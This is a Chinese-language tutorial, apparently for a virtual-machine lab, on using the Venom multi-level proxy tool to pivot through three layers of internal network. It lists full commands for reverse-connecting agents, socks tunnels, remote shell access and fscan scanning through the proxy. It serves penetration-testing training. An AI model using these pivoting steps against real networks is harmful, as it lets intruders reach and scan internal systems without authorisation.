一、工具下载
Venom是一款由go语言开发的多平台多级代理工具,渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点
下载地址:https://github.com/Dliv3/Venom/releases
二、网络环境
使用的是虚拟机模拟的环境,其中攻击机器是本机,其他几层主机为虚拟机。
IP分配如下
攻击机win10(主机A):192.168.247.1
win7外网(主机B):外网NAT 192.168.247.152,一层内网 172.16.1.30
win7内网工控(主机C):一层内网 172.16.16.3,二层内网 10.0.10.110
核心机器win2008(主机D):二层内网 10.0.10.111
三、Venom代理步骤
(一)第一层代理
1.在攻击机(192.168.247.1-主机A)上执行:
admin.exe -lport 9000
2.上传Venom对应的agent端(上传版本根据攻击目标系统确定)至win7外网(主机B),执行以下命令:
agent.exe -rhost 192.168.247.1 -rport 9000
此时可观察攻击主机(主机A),发现代理连接成功。
3.然后在攻击机(主机A)上执行命令,将流量代理到7777端口
goto 1
socks 7777
常用命令:show,goto,shell,exit。
① 执行show命令,可以看见刚刚连接成功的一个节点;
② goto 1 可以切换到1节点上面去
③shell 执行命令
④exit 退出,进行下一步的监听操作。
4.此时可测试是否代理成功(可在攻击机(主机A)上用浏览器建立代理或者使用Proxifier工具建立设置代理端口)。
(1)浏览器设置代理测试
(2)使用Proxifier设置进行测试。
5.设置完成后,浏览器尝试访问第一层内网(172.16.1.3),访问成功则代理设置成功。
设置成功后,可以用扫描工具进行第一层内网扫描。
因为fscan用ping做判断。因此扫描命令为:
fs.exe -np -h 172.16.1.3
或者
fs.exe -np -h 172.16.1.3 -proxy socks5://127.0.0.1:7777
(二)第二层代理
1.在攻击机(192.168.247.1--主机A)上节点一(node 1)进行监听,也就是在外网win7(主机B)上等待内网工控win7(主机C)连接。
执行命令:listen 9001
2.内网工控win7(主机C)执行连接命令:
C:\phpStudy\PHPTutorial\WWW> agent.exe -rhost 172.16.1.30 -rport 9001
然后在攻击机(主机A)上执行show,发现两个节点。
继续在攻击机(主机A)上执行以下命令,设置端口代理。
goto 2
socks 6002
3.在攻击机(主机A)的浏览器或者Proxifier进行代理端口设置,进行测试,发现测试成功。
(三)第三层代理
1.继续在攻击机(192.168.247.1--主机A)上节点2(node 2)进行监听,也就是在内网工控win7(主机C)上等待win2008(主机D)连接。
(node 2) >>> listen 9002
listen 9002
2.在windows2008(主机D)上执行代理客户端,命令同上。
C:\phpStudy\PHPTutorial\WWW> agent.exe -rhost 10.0.10.110 -rport 9002
3.执行完后,在攻击机(主机A)上发现代理连接成功。
the port 9002 is successfully listening on the remote node!
(node 2) >>> show
A
+ -- 1
+ -- 2
+ -- 3
(node 2) >>> goto 3
node 3
执行show发现,三层代理已经建立成功。